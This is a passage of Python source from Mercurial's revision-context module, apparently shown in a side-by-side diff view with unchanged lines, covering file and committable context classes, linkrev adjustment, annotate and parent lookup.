666 return r"<%s %s>" % (type(self).__name__, str(self))
667
667
668 def __hash__(self):
668 def __hash__(self):
669 try:
669 try:
670 return hash((self._path, self._filenode))
670 return hash((self._path, self._filenode))
671 except AttributeError:
671 except AttributeError:
672 return id(self)
672 return id(self)
673
673
674 def __eq__(self, other):
674 def __eq__(self, other):
675 try:
675 try:
676 return (type(self) == type(other) and self._path == other._path
676 return (type(self) == type(other) and self._path == other._path
677 and self._filenode == other._filenode)
677 and self._filenode == other._filenode)
678 except AttributeError:
678 except AttributeError:
679 return False
679 return False
680
680
681 def __ne__(self, other):
681 def __ne__(self, other):
682 return not (self == other)
682 return not (self == other)
683
683
684 def filerev(self):
684 def filerev(self):
685 return self._filerev
685 return self._filerev
686 def filenode(self):
686 def filenode(self):
687 return self._filenode
687 return self._filenode
688 @propertycache
688 @propertycache
689 def _flags(self):
689 def _flags(self):
690 return self._changectx.flags(self._path)
690 return self._changectx.flags(self._path)
691 def flags(self):
691 def flags(self):
692 return self._flags
692 return self._flags
693 def filelog(self):
693 def filelog(self):
694 return self._filelog
694 return self._filelog
695 def rev(self):
695 def rev(self):
696 return self._changeid
696 return self._changeid
697 def linkrev(self):
697 def linkrev(self):
698 return self._filelog.linkrev(self._filerev)
698 return self._filelog.linkrev(self._filerev)
699 def node(self):
699 def node(self):
700 return self._changectx.node()
700 return self._changectx.node()
701 def hex(self):
701 def hex(self):
702 return self._changectx.hex()
702 return self._changectx.hex()
703 def user(self):
703 def user(self):
704 return self._changectx.user()
704 return self._changectx.user()
705 def date(self):
705 def date(self):
706 return self._changectx.date()
706 return self._changectx.date()
707 def files(self):
707 def files(self):
708 return self._changectx.files()
708 return self._changectx.files()
709 def description(self):
709 def description(self):
710 return self._changectx.description()
710 return self._changectx.description()
711 def branch(self):
711 def branch(self):
712 return self._changectx.branch()
712 return self._changectx.branch()
713 def extra(self):
713 def extra(self):
714 return self._changectx.extra()
714 return self._changectx.extra()
715 def phase(self):
715 def phase(self):
716 return self._changectx.phase()
716 return self._changectx.phase()
717 def phasestr(self):
717 def phasestr(self):
718 return self._changectx.phasestr()
718 return self._changectx.phasestr()
719 def obsolete(self):
719 def obsolete(self):
720 return self._changectx.obsolete()
720 return self._changectx.obsolete()
721 def instabilities(self):
721 def instabilities(self):
722 return self._changectx.instabilities()
722 return self._changectx.instabilities()
723 def manifest(self):
723 def manifest(self):
724 return self._changectx.manifest()
724 return self._changectx.manifest()
725 def changectx(self):
725 def changectx(self):
726 return self._changectx
726 return self._changectx
727 def renamed(self):
727 def renamed(self):
728 return self._copied
728 return self._copied
729 def repo(self):
729 def repo(self):
730 return self._repo
730 return self._repo
731 def size(self):
731 def size(self):
732 return len(self.data())
732 return len(self.data())
733
733
734 def path(self):
734 def path(self):
735 return self._path
735 return self._path
736
736
737 def isbinary(self):
737 def isbinary(self):
738 try:
738 try:
739 return stringutil.binary(self.data())
739 return stringutil.binary(self.data())
740 except IOError:
740 except IOError:
741 return False
741 return False
742 def isexec(self):
742 def isexec(self):
743 return 'x' in self.flags()
743 return 'x' in self.flags()
744 def islink(self):
744 def islink(self):
745 return 'l' in self.flags()
745 return 'l' in self.flags()
746
746
747 def isabsent(self):
747 def isabsent(self):
748 """whether this filectx represents a file not in self._changectx
748 """whether this filectx represents a file not in self._changectx
749
749
750 This is mainly for merge code to detect change/delete conflicts. This is
750 This is mainly for merge code to detect change/delete conflicts. This is
751 expected to be True for all subclasses of basectx."""
751 expected to be True for all subclasses of basectx."""
752 return False
752 return False
753
753
754 _customcmp = False
754 _customcmp = False
755 def cmp(self, fctx):
755 def cmp(self, fctx):
756 """compare with other file context
756 """compare with other file context
757
757
758 returns True if different than fctx.
758 returns True if different than fctx.
759 """
759 """
760 if fctx._customcmp:
760 if fctx._customcmp:
761 return fctx.cmp(self)
761 return fctx.cmp(self)
762
762
763 if (fctx._filenode is None
763 if (fctx._filenode is None
764 and (self._repo._encodefilterpats
764 and (self._repo._encodefilterpats
765 # if file data starts with '\1\n', empty metadata block is
765 # if file data starts with '\1\n', empty metadata block is
766 # prepended, which adds 4 bytes to filelog.size().
766 # prepended, which adds 4 bytes to filelog.size().
767 or self.size() - 4 == fctx.size())
767 or self.size() - 4 == fctx.size())
768 or self.size() == fctx.size()):
768 or self.size() == fctx.size()):
769 return self._filelog.cmp(self._filenode, fctx.data())
769 return self._filelog.cmp(self._filenode, fctx.data())
770
770
771 return True
771 return True
772
772
773 def _adjustlinkrev(self, srcrev, inclusive=False):
773 def _adjustlinkrev(self, srcrev, inclusive=False):
774 """return the first ancestor of <srcrev> introducing <fnode>
774 """return the first ancestor of <srcrev> introducing <fnode>
775
775
776 If the linkrev of the file revision does not point to an ancestor of
776 If the linkrev of the file revision does not point to an ancestor of
777 srcrev, we'll walk down the ancestors until we find one introducing
777 srcrev, we'll walk down the ancestors until we find one introducing
778 this file revision.
778 this file revision.
779
779
780 :srcrev: the changeset revision we search ancestors from
780 :srcrev: the changeset revision we search ancestors from
781 :inclusive: if true, the src revision will also be checked
781 :inclusive: if true, the src revision will also be checked
782 """
782 """
783 repo = self._repo
783 repo = self._repo
784 cl = repo.unfiltered().changelog
784 cl = repo.unfiltered().changelog
785 mfl = repo.manifestlog
785 mfl = repo.manifestlog
786 # fetch the linkrev
786 # fetch the linkrev
787 lkr = self.linkrev()
787 lkr = self.linkrev()
788 # hack to reuse ancestor computation when searching for renames
788 # hack to reuse ancestor computation when searching for renames
789 memberanc = getattr(self, '_ancestrycontext', None)
789 memberanc = getattr(self, '_ancestrycontext', None)
790 iteranc = None
790 iteranc = None
791 if srcrev is None:
791 if srcrev is None:
792 # wctx case, used by workingfilectx during mergecopy
792 # wctx case, used by workingfilectx during mergecopy
793 revs = [p.rev() for p in self._repo[None].parents()]
793 revs = [p.rev() for p in self._repo[None].parents()]
794 inclusive = True # we skipped the real (revless) source
794 inclusive = True # we skipped the real (revless) source
795 else:
795 else:
796 revs = [srcrev]
796 revs = [srcrev]
797 if memberanc is None:
797 if memberanc is None:
798 memberanc = iteranc = cl.ancestors(revs, lkr,
798 memberanc = iteranc = cl.ancestors(revs, lkr,
799 inclusive=inclusive)
799 inclusive=inclusive)
800 # check if this linkrev is an ancestor of srcrev
800 # check if this linkrev is an ancestor of srcrev
801 if lkr not in memberanc:
801 if lkr not in memberanc:
802 if iteranc is None:
802 if iteranc is None:
803 iteranc = cl.ancestors(revs, lkr, inclusive=inclusive)
803 iteranc = cl.ancestors(revs, lkr, inclusive=inclusive)
804 fnode = self._filenode
804 fnode = self._filenode
805 path = self._path
805 path = self._path
806 for a in iteranc:
806 for a in iteranc:
807 ac = cl.read(a) # get changeset data (we avoid object creation)
807 ac = cl.read(a) # get changeset data (we avoid object creation)
808 if path in ac[3]: # checking the 'files' field.
808 if path in ac[3]: # checking the 'files' field.
809 # The file has been touched, check if the content is
809 # The file has been touched, check if the content is
810 # similar to the one we search for.
810 # similar to the one we search for.
811 if fnode == mfl[ac[0]].readfast().get(path):
811 if fnode == mfl[ac[0]].readfast().get(path):
812 return a
812 return a
813 # In theory, we should never get out of that loop without a result.
813 # In theory, we should never get out of that loop without a result.
814 # But if manifest uses a buggy file revision (not children of the
814 # But if manifest uses a buggy file revision (not children of the
815 # one it replaces) we could. Such a buggy situation will likely
815 # one it replaces) we could. Such a buggy situation will likely
816 # result is crash somewhere else at to some point.
816 # result is crash somewhere else at to some point.
817 return lkr
817 return lkr
818
818
819 def introrev(self):
819 def introrev(self):
820 """return the rev of the changeset which introduced this file revision
820 """return the rev of the changeset which introduced this file revision
821
821
822 This method is different from linkrev because it take into account the
822 This method is different from linkrev because it take into account the
823 changeset the filectx was created from. It ensures the returned
823 changeset the filectx was created from. It ensures the returned
824 revision is one of its ancestors. This prevents bugs from
824 revision is one of its ancestors. This prevents bugs from
825 'linkrev-shadowing' when a file revision is used by multiple
825 'linkrev-shadowing' when a file revision is used by multiple
826 changesets.
826 changesets.
827 """
827 """
828 lkr = self.linkrev()
828 lkr = self.linkrev()
829 attrs = vars(self)
829 attrs = vars(self)
830 noctx = not (r'_changeid' in attrs or r'_changectx' in attrs)
830 noctx = not (r'_changeid' in attrs or r'_changectx' in attrs)
831 if noctx or self.rev() == lkr:
831 if noctx or self.rev() == lkr:
832 return self.linkrev()
832 return self.linkrev()
833 return self._adjustlinkrev(self.rev(), inclusive=True)
833 return self._adjustlinkrev(self.rev(), inclusive=True)
834
834
835 def introfilectx(self):
835 def introfilectx(self):
836 """Return filectx having identical contents, but pointing to the
836 """Return filectx having identical contents, but pointing to the
837 changeset revision where this filectx was introduced"""
837 changeset revision where this filectx was introduced"""
838 introrev = self.introrev()
838 introrev = self.introrev()
839 if self.rev() == introrev:
839 if self.rev() == introrev:
840 return self
840 return self
841 return self.filectx(self.filenode(), changeid=introrev)
841 return self.filectx(self.filenode(), changeid=introrev)
842
842
843 def _parentfilectx(self, path, fileid, filelog):
843 def _parentfilectx(self, path, fileid, filelog):
844 """create parent filectx keeping ancestry info for _adjustlinkrev()"""
844 """create parent filectx keeping ancestry info for _adjustlinkrev()"""
845 fctx = filectx(self._repo, path, fileid=fileid, filelog=filelog)
845 fctx = filectx(self._repo, path, fileid=fileid, filelog=filelog)
846 if r'_changeid' in vars(self) or r'_changectx' in vars(self):
846 if r'_changeid' in vars(self) or r'_changectx' in vars(self):
847 # If self is associated with a changeset (probably explicitly
847 # If self is associated with a changeset (probably explicitly
848 # fed), ensure the created filectx is associated with a
848 # fed), ensure the created filectx is associated with a
849 # changeset that is an ancestor of self.changectx.
849 # changeset that is an ancestor of self.changectx.
850 # This lets us later use _adjustlinkrev to get a correct link.
850 # This lets us later use _adjustlinkrev to get a correct link.
851 fctx._descendantrev = self.rev()
851 fctx._descendantrev = self.rev()
852 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
852 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
853 elif r'_descendantrev' in vars(self):
853 elif r'_descendantrev' in vars(self):
854 # Otherwise propagate _descendantrev if we have one associated.
854 # Otherwise propagate _descendantrev if we have one associated.
855 fctx._descendantrev = self._descendantrev
855 fctx._descendantrev = self._descendantrev
856 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
856 fctx._ancestrycontext = getattr(self, '_ancestrycontext', None)
857 return fctx
857 return fctx
858
858
859 def parents(self):
859 def parents(self):
860 _path = self._path
860 _path = self._path
861 fl = self._filelog
861 fl = self._filelog
862 parents = self._filelog.parents(self._filenode)
862 parents = self._filelog.parents(self._filenode)
863 pl = [(_path, node, fl) for node in parents if node != nullid]
863 pl = [(_path, node, fl) for node in parents if node != nullid]
864
864
865 r = fl.renamed(self._filenode)
865 r = fl.renamed(self._filenode)
866 if r:
866 if r:
867 # - In the simple rename case, both parent are nullid, pl is empty.
867 # - In the simple rename case, both parent are nullid, pl is empty.
868 # - In case of merge, only one of the parent is null id and should
868 # - In case of merge, only one of the parent is null id and should
869 # be replaced with the rename information. This parent is -always-
869 # be replaced with the rename information. This parent is -always-
870 # the first one.
870 # the first one.
871 #
871 #
872 # As null id have always been filtered out in the previous list
872 # As null id have always been filtered out in the previous list
873 # comprehension, inserting to 0 will always result in "replacing
873 # comprehension, inserting to 0 will always result in "replacing
874 # first nullid parent with rename information.
874 # first nullid parent with rename information.
875 pl.insert(0, (r[0], r[1], self._repo.file(r[0])))
875 pl.insert(0, (r[0], r[1], self._repo.file(r[0])))
876
876
877 return [self._parentfilectx(path, fnode, l) for path, fnode, l in pl]
877 return [self._parentfilectx(path, fnode, l) for path, fnode, l in pl]
878
878
879 def p1(self):
879 def p1(self):
880 return self.parents()[0]
880 return self.parents()[0]
881
881
882 def p2(self):
882 def p2(self):
883 p = self.parents()
883 p = self.parents()
884 if len(p) == 2:
884 if len(p) == 2:
885 return p[1]
885 return p[1]
886 return filectx(self._repo, self._path, fileid=-1, filelog=self._filelog)
886 return filectx(self._repo, self._path, fileid=-1, filelog=self._filelog)
887
887
888 def annotate(self, follow=False, skiprevs=None, diffopts=None):
888 def annotate(self, follow=False, skiprevs=None, diffopts=None):
889 """Returns a list of annotateline objects for each line in the file
889 """Returns a list of annotateline objects for each line in the file
890
890
891 - line.fctx is the filectx of the node where that line was last changed
891 - line.fctx is the filectx of the node where that line was last changed
892 - line.lineno is the line number at the first appearance in the managed
892 - line.lineno is the line number at the first appearance in the managed
893 file
893 file
894 - line.text is the data on that line (including newline character)
894 - line.text is the data on that line (including newline character)
895 """
895 """
896 getlog = util.lrucachefunc(lambda x: self._repo.file(x))
896 getlog = util.lrucachefunc(lambda x: self._repo.file(x))
897
897
898 def parents(f):
898 def parents(f):
899 # Cut _descendantrev here to mitigate the penalty of lazy linkrev
899 # Cut _descendantrev here to mitigate the penalty of lazy linkrev
900 # adjustment. Otherwise, p._adjustlinkrev() would walk changelog
900 # adjustment. Otherwise, p._adjustlinkrev() would walk changelog
901 # from the topmost introrev (= srcrev) down to p.linkrev() if it
901 # from the topmost introrev (= srcrev) down to p.linkrev() if it
902 # isn't an ancestor of the srcrev.
902 # isn't an ancestor of the srcrev.
903 f._changeid
903 f._changeid
904 pl = f.parents()
904 pl = f.parents()
905
905
906 # Don't return renamed parents if we aren't following.
906 # Don't return renamed parents if we aren't following.
907 if not follow:
907 if not follow:
908 pl = [p for p in pl if p.path() == f.path()]
908 pl = [p for p in pl if p.path() == f.path()]
909
909
910 # renamed filectx won't have a filelog yet, so set it
910 # renamed filectx won't have a filelog yet, so set it
911 # from the cache to save time
911 # from the cache to save time
912 for p in pl:
912 for p in pl:
913 if not r'_filelog' in p.__dict__:
913 if not r'_filelog' in p.__dict__:
914 p._filelog = getlog(p.path())
914 p._filelog = getlog(p.path())
915
915
916 return pl
916 return pl
917
917
918 # use linkrev to find the first changeset where self appeared
918 # use linkrev to find the first changeset where self appeared
919 base = self.introfilectx()
919 base = self.introfilectx()
920 if getattr(base, '_ancestrycontext', None) is None:
920 if getattr(base, '_ancestrycontext', None) is None:
921 cl = self._repo.changelog
921 cl = self._repo.changelog
922 if base.rev() is None:
922 if base.rev() is None:
923 # wctx is not inclusive, but works because _ancestrycontext
923 # wctx is not inclusive, but works because _ancestrycontext
924 # is used to test filelog revisions
924 # is used to test filelog revisions
925 ac = cl.ancestors([p.rev() for p in base.parents()],
925 ac = cl.ancestors([p.rev() for p in base.parents()],
926 inclusive=True)
926 inclusive=True)
927 else:
927 else:
928 ac = cl.ancestors([base.rev()], inclusive=True)
928 ac = cl.ancestors([base.rev()], inclusive=True)
929 base._ancestrycontext = ac
929 base._ancestrycontext = ac
930
930
931 return dagop.annotate(base, parents, skiprevs=skiprevs,
931 return dagop.annotate(base, parents, skiprevs=skiprevs,
932 diffopts=diffopts)
932 diffopts=diffopts)
933
933
934 def ancestors(self, followfirst=False):
934 def ancestors(self, followfirst=False):
935 visit = {}
935 visit = {}
936 c = self
936 c = self
937 if followfirst:
937 if followfirst:
938 cut = 1
938 cut = 1
939 else:
939 else:
940 cut = None
940 cut = None
941
941
942 while True:
942 while True:
943 for parent in c.parents()[:cut]:
943 for parent in c.parents()[:cut]:
944 visit[(parent.linkrev(), parent.filenode())] = parent
944 visit[(parent.linkrev(), parent.filenode())] = parent
945 if not visit:
945 if not visit:
946 break
946 break
947 c = visit.pop(max(visit))
947 c = visit.pop(max(visit))
948 yield c
948 yield c
949
949
950 def decodeddata(self):
950 def decodeddata(self):
951 """Returns `data()` after running repository decoding filters.
951 """Returns `data()` after running repository decoding filters.
952
952
953 This is often equivalent to how the data would be expressed on disk.
953 This is often equivalent to how the data would be expressed on disk.
954 """
954 """
955 return self._repo.wwritedata(self.path(), self.data())
955 return self._repo.wwritedata(self.path(), self.data())
956
956
957 class filectx(basefilectx):
957 class filectx(basefilectx):
958 """A filecontext object makes access to data related to a particular
958 """A filecontext object makes access to data related to a particular
959 filerevision convenient."""
959 filerevision convenient."""
960 def __init__(self, repo, path, changeid=None, fileid=None,
960 def __init__(self, repo, path, changeid=None, fileid=None,
961 filelog=None, changectx=None):
961 filelog=None, changectx=None):
962 """changeid can be a changeset revision, node, or tag.
962 """changeid can be a changeset revision, node, or tag.
963 fileid can be a file revision or node."""
963 fileid can be a file revision or node."""
964 self._repo = repo
964 self._repo = repo
965 self._path = path
965 self._path = path
966
966
967 assert (changeid is not None
967 assert (changeid is not None
968 or fileid is not None
968 or fileid is not None
969 or changectx is not None), \
969 or changectx is not None), \
970 ("bad args: changeid=%r, fileid=%r, changectx=%r"
970 ("bad args: changeid=%r, fileid=%r, changectx=%r"
971 % (changeid, fileid, changectx))
971 % (changeid, fileid, changectx))
972
972
973 if filelog is not None:
973 if filelog is not None:
974 self._filelog = filelog
974 self._filelog = filelog
975
975
976 if changeid is not None:
976 if changeid is not None:
977 self._changeid = changeid
977 self._changeid = changeid
978 if changectx is not None:
978 if changectx is not None:
979 self._changectx = changectx
979 self._changectx = changectx
980 if fileid is not None:
980 if fileid is not None:
981 self._fileid = fileid
981 self._fileid = fileid
982
982
983 @propertycache
983 @propertycache
984 def _changectx(self):
984 def _changectx(self):
985 try:
985 try:
986 return changectx(self._repo, self._changeid)
986 return changectx(self._repo, self._changeid)
987 except error.FilteredRepoLookupError:
987 except error.FilteredRepoLookupError:
988 # Linkrev may point to any revision in the repository. When the
988 # Linkrev may point to any revision in the repository. When the
989 # repository is filtered this may lead to `filectx` trying to build
989 # repository is filtered this may lead to `filectx` trying to build
990 # `changectx` for filtered revision. In such case we fallback to
990 # `changectx` for filtered revision. In such case we fallback to
991 # creating `changectx` on the unfiltered version of the reposition.
991 # creating `changectx` on the unfiltered version of the reposition.
992 # This fallback should not be an issue because `changectx` from
992 # This fallback should not be an issue because `changectx` from
993 # `filectx` are not used in complex operations that care about
993 # `filectx` are not used in complex operations that care about
994 # filtering.
994 # filtering.
995 #
995 #
996 # This fallback is a cheap and dirty fix that prevent several
996 # This fallback is a cheap and dirty fix that prevent several
997 # crashes. It does not ensure the behavior is correct. However the
997 # crashes. It does not ensure the behavior is correct. However the
998 # behavior was not correct before filtering either and "incorrect
998 # behavior was not correct before filtering either and "incorrect
999 # behavior" is seen as better as "crash"
999 # behavior" is seen as better as "crash"
1000 #
1000 #
1001 # Linkrevs have several serious troubles with filtering that are
1001 # Linkrevs have several serious troubles with filtering that are
1002 # complicated to solve. Proper handling of the issue here should be
1002 # complicated to solve. Proper handling of the issue here should be
1003 # considered when solving linkrev issue are on the table.
1003 # considered when solving linkrev issue are on the table.
1004 return changectx(self._repo.unfiltered(), self._changeid)
1004 return changectx(self._repo.unfiltered(), self._changeid)
1005
1005
1006 def filectx(self, fileid, changeid=None):
1006 def filectx(self, fileid, changeid=None):
1007 '''opens an arbitrary revision of the file without
1007 '''opens an arbitrary revision of the file without
1008 opening a new filelog'''
1008 opening a new filelog'''
1009 return filectx(self._repo, self._path, fileid=fileid,
1009 return filectx(self._repo, self._path, fileid=fileid,
1010 filelog=self._filelog, changeid=changeid)
1010 filelog=self._filelog, changeid=changeid)
1011
1011
1012 def rawdata(self):
1012 def rawdata(self):
1013 return self._filelog.revision(self._filenode, raw=True)
1013 return self._filelog.revision(self._filenode, raw=True)
1014
1014
1015 def rawflags(self):
1015 def rawflags(self):
1016 """low-level revlog flags"""
1016 """low-level revlog flags"""
1017 return self._filelog.flags(self._filerev)
1017 return self._filelog.flags(self._filerev)
1018
1018
1019 def data(self):
1019 def data(self):
1020 try:
1020 try:
1021 return self._filelog.read(self._filenode)
1021 return self._filelog.read(self._filenode)
1022 except error.CensoredNodeError:
1022 except error.CensoredNodeError:
1023 if self._repo.ui.config("censor", "policy") == "ignore":
1023 if self._repo.ui.config("censor", "policy") == "ignore":
1024 return ""
1024 return ""
1025 raise error.Abort(_("censored node: %s") % short(self._filenode),
1025 raise error.Abort(_("censored node: %s") % short(self._filenode),
1026 hint=_("set censor.policy to ignore errors"))
1026 hint=_("set censor.policy to ignore errors"))
1027
1027
1028 def size(self):
1028 def size(self):
1029 return self._filelog.size(self._filerev)
1029 return self._filelog.size(self._filerev)
1030
1030
1031 @propertycache
1031 @propertycache
1032 def _copied(self):
1032 def _copied(self):
1033 """check if file was actually renamed in this changeset revision
1033 """check if file was actually renamed in this changeset revision
1034
1034
1035 If rename logged in file revision, we report copy for changeset only
1035 If rename logged in file revision, we report copy for changeset only
1036 if file revisions linkrev points back to the changeset in question
1036 if file revisions linkrev points back to the changeset in question
1037 or both changeset parents contain different file revisions.
1037 or both changeset parents contain different file revisions.
1038 """
1038 """
1039
1039
1040 renamed = self._filelog.renamed(self._filenode)
1040 renamed = self._filelog.renamed(self._filenode)
1041 if not renamed:
1041 if not renamed:
1042 return renamed
1042 return renamed
1043
1043
1044 if self.rev() == self.linkrev():
1044 if self.rev() == self.linkrev():
1045 return renamed
1045 return renamed
1046
1046
1047 name = self.path()
1047 name = self.path()
1048 fnode = self._filenode
1048 fnode = self._filenode
1049 for p in self._changectx.parents():
1049 for p in self._changectx.parents():
1050 try:
1050 try:
1051 if fnode == p.filenode(name):
1051 if fnode == p.filenode(name):
1052 return None
1052 return None
1053 except error.LookupError:
1053 except error.LookupError:
1054 pass
1054 pass
1055 return renamed
1055 return renamed
1056
1056
1057 def children(self):
1057 def children(self):
1058 # hard for renames
1058 # hard for renames
1059 c = self._filelog.children(self._filenode)
1059 c = self._filelog.children(self._filenode)
1060 return [filectx(self._repo, self._path, fileid=x,
1060 return [filectx(self._repo, self._path, fileid=x,
1061 filelog=self._filelog) for x in c]
1061 filelog=self._filelog) for x in c]
1062
1062
1063 class committablectx(basectx):
1063 class committablectx(basectx):
1064 """A committablectx object provides common functionality for a context that
1064 """A committablectx object provides common functionality for a context that
1065 wants the ability to commit, e.g. workingctx or memctx."""
1065 wants the ability to commit, e.g. workingctx or memctx."""
1066 def __init__(self, repo, text="", user=None, date=None, extra=None,
1066 def __init__(self, repo, text="", user=None, date=None, extra=None,
1067 changes=None):
1067 changes=None):
1068 super(committablectx, self).__init__(repo)
1068 super(committablectx, self).__init__(repo)
1069 self._rev = None
1069 self._rev = None
1070 self._node = None
1070 self._node = None
1071 self._text = text
1071 self._text = text
1072 if date:
1072 if date:
1073 self._date = dateutil.parsedate(date)
1073 self._date = dateutil.parsedate(date)
1074 if user:
1074 if user:
1075 self._user = user
1075 self._user = user
1076 if changes:
1076 if changes:
1077 self._status = changes
1077 self._status = changes
1078
1078
1079 self._extra = {}
1079 self._extra = {}
1080 if extra:
1080 if extra:
1081 self._extra = extra.copy()
1081 self._extra = extra.copy()
1082 if 'branch' not in self._extra:
1082 if 'branch' not in self._extra:
1083 try:
1083 try:
1084 branch = encoding.fromlocal(self._repo.dirstate.branch())
1084 branch = encoding.fromlocal(self._repo.dirstate.branch())
1085 except UnicodeDecodeError:
1085 except UnicodeDecodeError:
1086 raise error.Abort(_('branch name not in UTF-8!'))
1086 raise error.Abort(_('branch name not in UTF-8!'))
1087 self._extra['branch'] = branch
1087 self._extra['branch'] = branch
1088 if self._extra['branch'] == '':
1088 if self._extra['branch'] == '':
1089 self._extra['branch'] = 'default'
1089 self._extra['branch'] = 'default'
1090
1090
1091 def __bytes__(self):
1091 def __bytes__(self):
1092 return bytes(self._parents[0]) + "+"
1092 return bytes(self._parents[0]) + "+"
1093
1093
1094 __str__ = encoding.strmethod(__bytes__)
1094 __str__ = encoding.strmethod(__bytes__)
1095
1095
1096 def __nonzero__(self):
1096 def __nonzero__(self):
1097 return True
1097 return True
1098
1098
1099 __bool__ = __nonzero__
1099 __bool__ = __nonzero__
1100
1100
1101 def _buildflagfunc(self):
1101 def _buildflagfunc(self):
1102 # Create a fallback function for getting file flags when the
1102 # Create a fallback function for getting file flags when the
1103 # filesystem doesn't support them
1103 # filesystem doesn't support them
1104
1104
1105 copiesget = self._repo.dirstate.copies().get
1105 copiesget = self._repo.dirstate.copies().get
1106 parents = self.parents()
1106 parents = self.parents()
1107 if len(parents) < 2:
1107 if len(parents) < 2:
1108 # when we have one parent, it's easy: copy from parent
1108 # when we have one parent, it's easy: copy from parent
1109 man = parents[0].manifest()
1109 man = parents[0].manifest()
1110 def func(f):
1110 def func(f):
1111 f = copiesget(f, f)
1111 f = copiesget(f, f)
1112 return man.flags(f)
1112 return man.flags(f)
1113 else:
1113 else:
1114 # merges are tricky: we try to reconstruct the unstored
1114 # merges are tricky: we try to reconstruct the unstored
1115 # result from the merge (issue1802)
1115 # result from the merge (issue1802)
1116 p1, p2 = parents
1116 p1, p2 = parents
1117 pa = p1.ancestor(p2)
1117 pa = p1.ancestor(p2)
1118 m1, m2, ma = p1.manifest(), p2.manifest(), pa.manifest()
1118 m1, m2, ma = p1.manifest(), p2.manifest(), pa.manifest()
1119
1119
1120 def func(f):
1120 def func(f):
1121 f = copiesget(f, f) # may be wrong for merges with copies
1121 f = copiesget(f, f) # may be wrong for merges with copies
1122 fl1, fl2, fla = m1.flags(f), m2.flags(f), ma.flags(f)
1122 fl1, fl2, fla = m1.flags(f), m2.flags(f), ma.flags(f)
1123 if fl1 == fl2:
1123 if fl1 == fl2:
1124 return fl1
1124 return fl1
1125 if fl1 == fla:
1125 if fl1 == fla:
1126 return fl2
1126 return fl2
1127 if fl2 == fla:
1127 if fl2 == fla:
1128 return fl1
1128 return fl1
1129 return '' # punt for conflicts
1129 return '' # punt for conflicts
1130
1130
1131 return func
1131 return func
1132
1132
1133 @propertycache
1133 @propertycache
1134 def _flagfunc(self):
1134 def _flagfunc(self):
1135 return self._repo.dirstate.flagfunc(self._buildflagfunc)
1135 return self._repo.dirstate.flagfunc(self._buildflagfunc)
1136
1136
1137 @propertycache
1137 @propertycache
1138 def _status(self):
1138 def _status(self):
1139 return self._repo.status()
1139 return self._repo.status()
1140
1140
1141 @propertycache
1141 @propertycache
1142 def _user(self):
1142 def _user(self):
1143 return self._repo.ui.username()
1143 return self._repo.ui.username()
1144
1144
1145 @propertycache
1145 @propertycache
1146 def _date(self):
1146 def _date(self):
1147 ui = self._repo.ui
1147 ui = self._repo.ui
1148 date = ui.configdate('devel', 'default-date')
1148 date = ui.configdate('devel', 'default-date')
1149 if date is None:
1149 if date is None:
1150 date = dateutil.makedate()
1150 date = dateutil.makedate()
1151 return date
1151 return date
1152
1152
1153 def subrev(self, subpath):
1153 def subrev(self, subpath):
1154 return None
1154 return None
1155
1155
1156 def manifestnode(self):
1156 def manifestnode(self):
1157 return None
1157 return None
1158 def user(self):
1158 def user(self):
1159 return self._user or self._repo.ui.username()
1159 return self._user or self._repo.ui.username()
1160 def date(self):
1160 def date(self):
1161 return self._date
1161 return self._date
1162 def description(self):
1162 def description(self):
1163 return self._text
1163 return self._text
1164 def files(self):
1164 def files(self):
1165 return sorted(self._status.modified + self._status.added +
1165 return sorted(self._status.modified + self._status.added +
1166 self._status.removed)
1166 self._status.removed)
1167
1167
1168 def modified(self):
1168 def modified(self):
1169 return self._status.modified
1169 return self._status.modified
1170 def added(self):
1170 def added(self):
1171 return self._status.added
1171 return self._status.added
1172 def removed(self):
1172 def removed(self):
1173 return self._status.removed
1173 return self._status.removed
1174 def deleted(self):
1174 def deleted(self):
1175 return self._status.deleted
1175 return self._status.deleted
1176 def branch(self):
1176 def branch(self):
1177 return encoding.tolocal(self._extra['branch'])
1177 return encoding.tolocal(self._extra['branch'])
1178 def closesbranch(self):
1178 def closesbranch(self):
1179 return 'close' in self._extra
1179 return 'close' in self._extra
1180 def extra(self):
1180 def extra(self):
1181 return self._extra
1181 return self._extra
1182
1182
1183 def isinmemory(self):
1183 def isinmemory(self):
1184 return False
1184 return False
1185
1185
1186 def tags(self):
1186 def tags(self):
1187 return []
1187 return []
1188
1188
1189 def bookmarks(self):
1189 def bookmarks(self):
1190 b = []
1190 b = []
1191 for p in self.parents():
1191 for p in self.parents():
1192 b.extend(p.bookmarks())
1192 b.extend(p.bookmarks())
1193 return b
1193 return b
1194
1194
1195 def phase(self):
1195 def phase(self):
1196 phase = phases.draft # default phase to draft
1196 phase = phases.draft # default phase to draft
1197 for p in self.parents():
1197 for p in self.parents():
1198 phase = max(phase, p.phase())
1198 phase = max(phase, p.phase())
1199 return phase
1199 return phase
1200
1200
1201 def hidden(self):
1201 def hidden(self):
1202 return False
1202 return False
1203
1203
1204 def children(self):
1204 def children(self):
1205 return []
1205 return []
1206
1206
1207 def flags(self, path):
1207 def flags(self, path):
1208 if r'_manifest' in self.__dict__:
1208 if r'_manifest' in self.__dict__:
1209 try:
1209 try:
1210 return self._manifest.flags(path)
1210 return self._manifest.flags(path)
1211 except KeyError:
1211 except KeyError:
1212 return ''
1212 return ''
1213
1213
1214 try:
1214 try:
1215 return self._flagfunc(path)
1215 return self._flagfunc(path)
1216 except OSError:
1216 except OSError:
1217 return ''
1217 return ''
1218
1218
1219 def ancestor(self, c2):
1219 def ancestor(self, c2):
1220 """return the "best" ancestor context of self and c2"""
1220 """return the "best" ancestor context of self and c2"""
1221 return self._parents[0].ancestor(c2) # punt on two parents for now
1221 return self._parents[0].ancestor(c2) # punt on two parents for now
1222
1222
1223 def walk(self, match):
1223 def walk(self, match):
1224 '''Generates matching file names.'''
1224 '''Generates matching file names.'''
1225 return sorted(self._repo.dirstate.walk(match,
1225 return sorted(self._repo.dirstate.walk(match,
1226 subrepos=sorted(self.substate),
1226 subrepos=sorted(self.substate),
1227 unknown=True, ignored=False))
1227 unknown=True, ignored=False))
1228
1228
1229 def matches(self, match):
1229 def matches(self, match):
1230 ds = self._repo.dirstate
1230 ds = self._repo.dirstate
1231 return sorted(f for f in ds.matches(match) if ds[f] != 'r')
1231 return sorted(f for f in ds.matches(match) if ds[f] != 'r')
1232
1232
1233 def ancestors(self):
1233 def ancestors(self):
1234 for p in self._parents:
1234 for p in self._parents:
1235 yield p
1235 yield p
1236 for a in self._repo.changelog.ancestors(
